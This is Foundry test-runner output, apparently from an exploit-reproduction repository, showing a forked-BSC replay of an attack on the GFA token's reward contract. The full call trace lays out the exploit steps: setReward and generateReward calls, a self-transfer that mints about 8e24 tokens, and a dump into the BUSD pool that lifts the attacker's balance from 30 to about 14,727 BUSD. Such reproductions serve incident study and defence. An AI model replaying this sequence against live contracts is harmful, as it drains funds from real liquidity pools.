Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (9302): Return value of low-level calls not used.
  --> src/test/2024-04/GFA_exp.sol:38:9:
   |
38 |         Reward.call(
   |         ^ (Relevant source part starts here and spans across multiple lines).

Warning (9302): Return value of low-level calls not used.
  --> src/test/2024-04/GFA_exp.sol:41:9:
   |
41 |         Reward.call(abi.encodeWithSelector(bytes4(0x3890ec92), 100));
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.21s (34.25ms CPU time)

Ran 1 test for src/test/2024-04/GFA_exp.sol:Exploit
[PASS] testExploit() (gas: 709456)
Logs:
  attacker balance BUSD before attack:: 30.000000000000000000
  attacker balance BUSD after attack:: 14727.536063502076013262

Traces:
  [274585] Exploit::setUp()
    ├─ [0] VM::createSelectFork("bsc", 37857763 [3.785e7])
    │   └─ ← [Return] 0
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::accesses(0x55d398326f99059fF775485246999027B3197955)
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000017058b35e777da275)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: 0x55d398326f99059fF775485246999027B3197955, fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x000000000000000000000000000000000000000000000001a055690d9db80000)
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 30000000000000000000 [3e19]
    └─ ← [Stop]

  [842056] Exploit::testExploit()
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 30000000000000000000 [3e19]
    ├─ [2425] 0x55d398326f99059fF775485246999027B3197955::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "attacker balance BUSD before attack:", val: 30000000000000000000 [3e19], decimals: 18)
    ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xa61a6d74b23b042d5d7b5b29b8eb5a2207b6ac808505edaef7c2b334e1031a15: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [2562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 30000000000000000000 [3e19])
    │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 30000000000000000000 [3e19])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0x000000000000000000000000000000000000000000000001a055690d9db80000
    │   └─ ← [Return] true
    ├─ [144297] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(30000000000000000000 [3e19], 0, [0x55d398326f99059fF775485246999027B3197955, 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD], Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1713113405 [1.713e9])
    │   ├─ [13634] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F, 30000000000000000000 [3e19])
    │   │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F, value: 30000000000000000000 [3e19])
    │   │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0x15ef15eae42eeb2f6acca2dbae20d03fa52732f1f8465bbc26072371d700e6f5: 0x000000000000000000000000000000000000000000000395dc351adb22ea7caf → 0x0000000000000000000000000000000000000000000003977c8a83e8c0a27caf
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0x000000000000000000000000000000000000000000000001a055690d9db80000 → 0
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000001a055690d9db80000 → 0
    │   │   └─ ← [Return] true
    │   ├─ [2908] 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [2893] 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F::getReserves() [staticcall]
    │   │   └─ ← [Return] 1177708227762213133487581 [1.177e24], 16931531933982254595247 [1.693e22], 1713113093 [1.713e9]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F) [staticcall]
    │   │   └─ ← [Return] 16961531933982254595247 [1.696e22]
    │   ├─ [111231] 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F::swap(2077823789133060321795 [2.077e21], 0, Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [76480] 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2077823789133060321795 [2.077e21])
    │   │   │   ├─ emit Transfer(from: 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2015489075459068512142 [2.015e21])
    │   │   │   ├─ emit Transfer(from: 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F, to: 0x78f5d8fd3232beb9b491e81B1cC53cFe000f66eE, value: 62334713673991809653 [6.233e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000006d42879b9c7a3fc78e
    │   │   │   │   @ 0x9415b16d59df878ed7fc4777cbcea124fad74528aa9c5ec5161415c4bf23a976: 0x00000000000000000000000000000000000000000000110dc73838018489a357 → 0x00000000000000000000000000000000000000000000111128499bd436810dcc
    │   │   │   │   @ 18: 0x000000000000000000000000000000000000000000002ee8320eb70eab70515e → 0x000000000000000000000000000000000000000000002f045af4f6ea767e1dde
    │   │   │   │   @ 0x15ef15eae42eeb2f6acca2dbae20d03fa52732f1f8465bbc26072371d700e6f5: 0x00000000000000000000000000000000000000000000f963b0e2681e2d440ddd → 0x00000000000000000000000000000000000000000000f8f30d4968af010cdbda
    │   │   │   │   @ 17: 0x000000000000000000000000000000000000000000002ee8320eb70eab70515e → 0x000000000000000000000000000000000000000000002f045af4f6ea767e1dde
    │   │   │   └─ ← [Return] true
    │   │   ├─ [908] 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD::balanceOf(0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F) [staticcall]
    │   │   │   └─ ← [Return] 1175630403973080073165786 [1.175e24]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F) [staticcall]
    │   │   │   └─ ← [Return] 16961531933982254595247 [1.696e22]
    │   │   ├─ emit Sync(reserve0: 1175630403973080073165786 [1.175e24], reserve1: 16961531933982254595247 [1.696e22])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 30000000000000000000 [3e19], amount0Out: 2077823789133060321795 [2.077e21], amount1Out: 0, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x000000000000000000000000000000000298c792cb202778cea31d9dc23b4344 → 0x00000000000000000000000000000000029d43de1035736b0c7d4bbca31c2414
    │   │   │   @ 8: 0x661c0805000000000395dc351adb22ea7caf00000000f963b0e2681e2d440ddd → 0x661c093d0000000003977c8a83e8c0a27caf00000000f8f30d4968af010cdbda
    │   │   │   @ 10: 0x0000000000000000000000000000004f64fc72a979d83b2ba4d615c4268a138d → 0x0000000000000000000000000000004fb9c24333a14d49b3a9c14f6a5fcc084d
    │   │   └─ ← [Stop]
    │   ├─ [908] 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 2015489075459068512142 [2.015e21]
    │   └─ ← [Stop]
    ├─ [200998] 0xbCbCb0e7E28414e084c4a40C1cCC30B75629a7DE::setReward(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 400000000000000000000000000 [4e26], 40000000000000000000000000 [4e25], 12222 [1.222e4])
    │   ├─  storage changes:
    │   │   @ 0xf652222313e28459528d920b65115c16c04f3efc82aaedc97be59f3f377c0d3f: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca66189: 0 → 0x0000000000000000000000000000000000000000002116545850052128000000
    │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca6618a: 0 → 12222
    │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca6618b: 0 → 0x00000000000000000000000000000000000000000000000000000000661c093d
    │   │   @ 1: 0 → 0x0000000000000000000000000000000000000000002116545850052128000000
    │   │   @ 6: 0 → 1
    │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca66187: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0 → 1
    │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca66188: 0 → 0x0000000000000000000000000000000000000000014adf4b7320334b90000000
    │   └─ ← [Stop]
    ├─ [218850] 0xbCbCb0e7E28414e084c4a40C1cCC30B75629a7DE::generateReward(100)
    │   ├─  emit topic 0: 0x042a4e062dcfeb517a668f8ad320e95b7275cef0f3ec89343dad0d2460f873f0
    │   │           data: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000002116545850052128000000000000000000000000000000000000000000000000000000000000000000006400000000000000000000000000000000000000000236261d10e0c8d1da00000000000000000000000000000000000000000000000001fc3842bd1f071c000000
    │   ├─  storage changes:
    │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0 → 1
    │   │   @ 0: 0 → 0x0000000000000000000000000000000000000000002116545850052128000000
    │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 0 → 0x0000000000000000000000000000000000000000002116545850052128000000
    │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x0000000000000000000000000000000000000000002116545850052128000000
    │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0d1: 0 → 0x00000000000000000000000000000000000000000001fc3842bd1f071c000000
    │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca66189: 0x0000000000000000000000000000000000000000002116545850052128000000 → 0
    │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0d0: 0 → 0x00000000000000000000000000000000000000000236261d10e0c8d1da000000
    │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0d2: 0 → 100
    │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0d3: 0 → 0x00000000000000000000000000000000000000000000000000000000661c093d
    │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0cf: 0 → 0x0000000000000000000000000000000000000000002116545850052128000000
    │   └─ ← [Stop]
    ├─ [52368] 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD::transfer(0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD, 10000 [1e4])
    │   ├─ [885] 0xbCbCb0e7E28414e084c4a40C1cCC30B75629a7DE::7f1b60c1(0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000002116545850052128000000
    │   ├─ [1495] 0xbCbCb0e7E28414e084c4a40C1cCC30B75629a7DE::7c6531e1(0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496)
    │   │   ├─  storage changes:
    │   │   │   @ 1: 0x0000000000000000000000000000000000000000002116545850052128000000 → 0
    │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 0x0000000000000000000000000000000000000000002116545850052128000000 → 0
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000002116545850052128000000
    │   ├─ emit Transfer(from: 0xE83d8a3C45b77d95C850C00aca53A57cE9D49314, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 8000000000000000000000000 [8e24])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD, value: 10000 [1e4])
    │   ├─  storage changes:
    │   │   @ 0x8c447153266ee7e656cf30e348b56b529eebf580bf9065e45715f9744d573eb5: 0x000000000000000000000000000000000000000000069e10de76676d08000000 → 0
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000006d42879b9c7a3fc78e → 0x000000000000000000000000000000000000000000069e7e20fe0309823fa07e
    │   │   @ 1: 0x0000000000000000000000000000000000000000002116545850052128000000 → 0
    │   │   @ 0x428ddfc992a680325700ff08299fea6f36012fce8040956ac705fe6bc9ba8199: 0 → 10000
    │   └─ ← [Return] true
    ├─ [908] 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 8002015489075459068502142 [8.002e24]
    ├─ [25289] 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 8002015489075459068502142 [8.002e24])
    │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 8002015489075459068502142 [8.002e24])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0x000000000000000000000000000000000000000000069e7e20fe0309823fa07e
    │   └─ ← [Return] true
    ├─ [100777] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(8002015489075459068502142 [8.002e24], 0, [0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD, 0x55d398326f99059fF775485246999027B3197955], Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1713113405 [1.713e9])
    │   ├─ [72034] 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD::transferFrom(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F, 8002015489075459068502142 [8.002e24])
    │   │   ├─ emit Transfer(from: 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F, to: 0x000000000000000000000000000000000000dEaD, value: 1175630403973080073165 [1.175e21])
    │   │   ├─ [9351] 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F::sync()
    │   │   │   ├─ [908] 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD::balanceOf(0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F) [staticcall]
    │   │   │   │   └─ ← [Return] 1174454773569106993092621 [1.174e24]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F) [staticcall]
    │   │   │   │   └─ ← [Return] 16961531933982254595247 [1.696e22]
    │   │   │   ├─ emit Sync(reserve0: 1174454773569106993092621 [1.174e24], reserve1: 16961531933982254595247 [1.696e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x661c093d0000000003977c8a83e8c0a27caf00000000f8f30d4968af010cdbda → 0x661c093d0000000003977c8a83e8c0a27caf00000000f8b352233106e4a2180d
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit AutoNukeLP()
    │   │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F, value: 7761955024403195296447078 [7.761e24])
    │   │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x78f5d8fd3232beb9b491e81B1cC53cFe000f66eE, value: 240060464672263772055064 [2.4e23])
    │   │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0xb34209a263f6c38fe55f099e9e70f9d67e93982480ff3234a5e0108028ad164d: 0 → 0x00000000000000000000000000000000000000000000003fbb2637a81c6ac3cd
    │   │   │   @ 0x15ef15eae42eeb2f6acca2dbae20d03fa52732f1f8465bbc26072371d700e6f5: 0x00000000000000000000000000000000000000000000f8f30d4968af010cdbda → 0x00000000000000000000000000000000000000000007645bbef09f7e32559273
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0x000000000000000000000000000000000000000000069e7e20fe0309823fa07e → 0
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000069e7e20fe0309823fa07e → 0
    │   │   │   @ 0x9415b16d59df878ed7fc4777cbcea124fad74528aa9c5ec5161415c4bf23a976: 0x00000000000000000000000000000000000000000000111128499bd436810dcc → 0x0000000000000000000000000000000000000000000043e6dc7a30666b0d33e4
    │   │   │   @ 32: 0x00000000000000000000000000000000000000000000000000000000661b345d → 0x00000000000000000000000000000000000000000000000000000000661c093d
    │   │   └─ ← [Return] true
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [893] 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F::getReserves() [staticcall]
    │   │   └─ ← [Return] 1174454773569106993092621 [1.174e24], 16961531933982254595247 [1.696e22], 1713113405 [1.713e9]
    │   ├─ [908] 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD::balanceOf(0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F) [staticcall]
    │   │   └─ ← [Return] 8936409797972302289539699 [8.936e24]
    │   ├─ [18738] 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F::swap(0, 14727536063502076013262 [1.472e22], Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 14727536063502076013262 [1.472e22])
    │   │   │   ├─ emit Transfer(from: 0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 14727536063502076013262 [1.472e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000031e619ed3ecc406eace
    │   │   │   │   @ 0x15ef15eae42eeb2f6acca2dbae20d03fa52732f1f8465bbc26072371d700e6f5: 0x0000000000000000000000000000000000000000000003977c8a83e8c0a27caf → 0x0000000000000000000000000000000000000000000000791aebaffbfc9b91e1
    │   │   │   └─ ← [Return] true
    │   │   ├─ [908] 0x278ce7151Bfd1b035e8Bc99e15b4d9773969D4eD::balanceOf(0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F) [staticcall]
    │   │   │   └─ ← [Return] 8936409797972302289539699 [8.936e24]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x875AC38Bc56E2c6FBEDa4354Ac085CB94d0D2D2F) [staticcall]
    │   │   │   └─ ← [Return] 2233995870480178581985 [2.233e21]
    │   │   ├─ emit Sync(reserve0: 8936409797972302289539699 [8.936e24], reserve1: 2233995870480178581985 [2.233e21])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 7761955024403195296447078 [7.761e24], amount1In: 0, amount0Out: 0, amount1Out: 14727536063502076013262 [1.472e22], to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x661c093d0000000003977c8a83e8c0a27caf00000000f8b352233106e4a2180d → 0x661c093d0000000000791aebaffbfc9b91e100000007645bbef09f7e32559273
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 14727536063502076013262 [1.472e22]
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 14727536063502076013262 [1.472e22]
    ├─ [425] 0x55d398326f99059fF775485246999027B3197955::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "attacker balance BUSD after attack:", val: 14727536063502076013262 [1.472e22], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0 → 0x0000000000000000000000000000000000000000002116545850052128000000
    │   @ 0x428ddfc992a680325700ff08299fea6f36012fce8040956ac705fe6bc9ba8199: 0 → 10000
    │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0x000000000000000000000000000000000000000000069e7e20fe0309823fa07e
    │   @ 0: 0 → 0x0000000000000000000000000000000000000000002116545850052128000000
